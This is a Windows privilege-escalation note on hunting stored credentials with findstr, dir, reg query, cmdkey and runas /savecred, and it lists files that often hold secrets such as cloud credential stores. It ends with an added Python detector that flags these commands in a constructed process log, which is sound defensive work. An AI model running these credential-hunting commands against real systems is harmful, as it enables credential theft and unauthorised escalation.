Gathering Stored Credentials
We can look for credentials stored on the system itself; if the credentials found belong to a higher-privileged (higher integrity) account, they can be used for privilege escalation and lateral movement.
Searching Password In Stored Files
- Find Password in File
findstr /s /i /n "Search String" *.txt
Passwords are often found in files with the following names or extensions:
install, backup, .bak, .log, .bat, .cmd, .vbs, .cnf, .conf,
.config, .ini, .xml, .txt, .gpg, .pgp, .p12, .der, .csr, .cer,
id_rsa, id_dsa, .ovpn, .rdp, vnc, ftp, ssh, vpn, git, .kdbx, .db
- Find files with "password" in the name
dir /b /a /s c:\ > filename.txt
type filename.txt | findstr /i password
- Look for Interesting Files
unattend.xml
Unattended.xml
sysprep.inf
sysprep.xml
VARIABLES.DAT
setupinfo
setupinfo.bak
web.config
SiteList.xml
.aws\credentials
.azure\accessTokens.json
.azure\azureProfile.json
gcloud\credentials.db
gcloud\legacy_credentials
gcloud\access_tokens.db
Searching Password In Registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Getting Password From Credential Manager
List all credentials available in Credential Manager:
cmdkey /list
To use the saved credentials, run the runas command with the /savecred option:
runas /savecred /user:admin cmd.exe
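Every command in this note leaves a process-creation event behind (Sysmon Event ID 1, or Security 4688 with command-line auditing enabled), which is what a defender should be watching for. The following Python is an added example, not part of the original note: it runs detection rules for the findstr, dir, reg query, cmdkey and runas patterns above over a constructed, pipe-separated process-creation export. The rule names and the export format are assumptions.

```python
import re

# Detection rules for the stored-credential hunting commands listed in this
# note. Each regex is matched against the CommandLine field of a process-
# creation event (Sysmon Event ID 1, or Security 4688 with command-line
# auditing enabled). Rule names are hypothetical.
RULES = [
    ("findstr_password_search", re.compile(r"\bfindstr\b.*\b(password|passwd|pwd|cred)", re.I)),
    ("registry_password_query", re.compile(r"\breg(\.exe)?\s+query\b.*\s/f\s+\S*(password|passwd|pwd)", re.I)),
    ("root_recursive_dir_listing", re.compile(r"\bdir\s.*\s/s\b.*\s[a-z]:\\(\s|$)", re.I)),
    ("credential_manager_enum", re.compile(r"\bcmdkey(\.exe)?\s+/list\b", re.I)),
    ("runas_savecred", re.compile(r"\brunas(\.exe)?\b.*\s/savecred\b", re.I)),
]

# Constructed sample export: timestamp|user|image|commandline. The command line
# is the last field so that pipes inside it ("type x | findstr ...") survive.
SAMPLE_LOG = r"""
2024-05-01T10:02:11Z|CORP\jdoe|C:\Windows\System32\findstr.exe|findstr /s /i /n "password" *.txt
2024-05-01T10:02:40Z|CORP\jdoe|C:\Windows\System32\cmd.exe|cmd.exe /c dir /b /a /s c:\ > filename.txt
2024-05-01T10:02:55Z|CORP\jdoe|C:\Windows\System32\cmd.exe|type filename.txt | findstr /i password
2024-05-01T10:03:05Z|CORP\jdoe|C:\Windows\System32\reg.exe|reg query HKLM /f password /t REG_SZ /s
2024-05-01T10:03:30Z|CORP\jdoe|C:\Windows\System32\cmdkey.exe|cmdkey /list
2024-05-01T10:04:02Z|CORP\jdoe|C:\Windows\System32\runas.exe|runas /savecred /user:admin cmd.exe
2024-05-01T11:15:00Z|CORP\svc-build|C:\Windows\System32\findstr.exe|findstr /i "error" build.log
2024-05-01T11:16:00Z|CORP\svc-build|C:\Windows\System32\reg.exe|reg query HKLM\SOFTWARE\Vendor /v Version
"""

def parse_event(line):
    """Split one export line into fields; maxsplit=3 keeps '|' inside the command line."""
    ts, user, image, cmdline = line.split("|", 3)
    return {"ts": ts, "user": user, "image": image, "cmdline": cmdline}

def match_rules(cmdline):
    """Return the names of every rule whose regex hits this command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan_log(text):
    """Return (rule, user, cmdline) for every flagged event in the export."""
    hits = []
    for line in filter(str.strip, text.splitlines()):
        ev = parse_event(line)
        for rule in match_rules(ev["cmdline"]):
            hits.append((rule, ev["user"], ev["cmdline"]))
    return hits

if __name__ == "__main__":
    for rule, user, cmd in scan_log(SAMPLE_LOG):
        print(f"[{rule}] {user}: {cmd}")
```

The two svc-build lines are ordinary administrative use and produce no hits; a burst of several rules firing for one user in a short window, as in the jdoe lines, is the signal worth alerting on.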